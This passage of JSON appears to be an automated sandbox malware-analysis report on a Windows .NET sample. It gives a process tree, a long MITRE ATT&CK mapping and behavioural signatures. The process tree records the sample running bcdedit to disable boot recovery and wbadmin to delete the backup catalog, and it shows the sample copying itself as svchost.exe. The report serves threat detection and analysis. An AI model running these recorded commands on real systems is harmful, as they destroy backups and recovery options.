"132aa270790f56a7524cab968927ed5e1d91b9a26d4badcb24e450e7decc5f81"}, {"uid": "00000000-00003944", "parentuid": "00000000-00005968", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00001216", "parentuid": "00000000-00003944", "name": "bcdedit.exe", "normalized_path": "%WINDIR%\\system32\\bcdedit.exe", "command_line": "bcdedit /set {default} bootstatuspolicy ignoreallfailures", "sha256": "e5bc427ba84627fa84861c54044df8ac3c3b3c3ed3d007265c6b18f588d0ca8a"}, {"uid": "00000000-00004368", "parentuid": "00000000-00003944", "name": "bcdedit.exe", "normalized_path": "%WINDIR%\\system32\\bcdedit.exe", "command_line": "bcdedit /set {default} recoveryenabled no", "sha256": "e5bc427ba84627fa84861c54044df8ac3c3b3c3ed3d007265c6b18f588d0ca8a"}, {"uid": "00000000-00003184", "parentuid": "00000000-00005968", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C wbadmin delete catalog -quiet", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00003720", "parentuid": "00000000-00003184", "name": "wbadmin.exe", "normalized_path": "%WINDIR%\\system32\\wbadmin.exe", "command_line": "wbadmin delete catalog -quiet", "sha256": "be527c6085cd944097de35b9740fc4dd24d455567bec596e9cc300d70c5a392d"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Replication Through Removable Media", "attck_id": "T1091", "attck_id_wiki": "https://attack.mitre.org/techniques/T1091", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 14}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Shortcut Modification", "attck_id": "T1547.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Shortcut Modification", "attck_id": "T1547.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Defense Evasion", "technique": "Reflective Code Loading", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Match Legitimate Name or Location", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005", "malicious_identifiers_count": 2, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Network Sniffing", "attck_id": "T1040", "attck_id_wiki": "https://attack.mitre.org/techniques/T1040", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 15}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Network Sniffing", "attck_id": "T1040", "attck_id_wiki": "https://attack.mitre.org/techniques/T1040", "suspicious_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Replication Through Removable Media", "attck_id": "T1091", "attck_id_wiki": "https://attack.mitre.org/techniques/T1091", "suspicious_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Information Repositories", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "informative_identifiers_count": 2, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Internal Defacement", "attck_id": "T1491.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491/001", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2, "parent": {"technique": "Defacement", "attck_id": "T1491", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491"}}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Inhibit System Recovery", "attck_id": "T1490", "attck_id_wiki": "https://attack.mitre.org/techniques/T1490", "malicious_identifiers_count": 4}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-615", "type": 2, "relevance": 1, "name": "Can loads assembly that contains the code that is currently executing [Dotnet]", "description": "Found string \"GetExecutingAssembly\" (Indicator: \"GetExecutingAssembly\"; File: \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2\")\n file/memory contains long string with (Indicator: \"GetExecutingAssembly\"; File: \"svchost.exe\")\n Found string \"GetExecutingAssembly\" (Indicator: \"GetExecutingAssembly\"; Source: \"00000000-00005776.00000000.66385.00CE2000.00000020.mdmp\")\n Found string \"GetExecutingAssembly\" (Indicator: \"GetExecutingAssembly\"; Source: \"00000000-00005968.00000002.70817.008E2000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" called \"CopyFileW\" to copy C:\\f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe to new location %APPDATA%\\svchost.exe (UID: 00000000-00005776)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-3", "type": 10, "name": "Loads the .NET runtime environment", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 63BC0000\n \"svchost.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 63410000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\CLR_PerfMon_WrapMutex\"\n \"Global\\CLR_PerfMon_WrapMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" touched \"Property System Both Class Factory\" (Path: \"HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" touched \"delegate folder that appears in Users Files Folder\" (Path: \"HKCU\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\SHELLFOLDER\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" touched \"Shell File System Folder\" (Path: \"HKCU\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32\")\n \"f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\\TREATAS\")\n \"svchost.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"svchost.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"svchost.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"svchost.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"svchost.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"svchost.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"svchost.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"svchost.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"svchost.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"svchost.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"svchost.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"svchost.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"svchost.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"svchost.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"svchost.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"svchost.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"svchost.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"svchost.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"svchost.exe\" touched \"Games Explorer\" (Path: 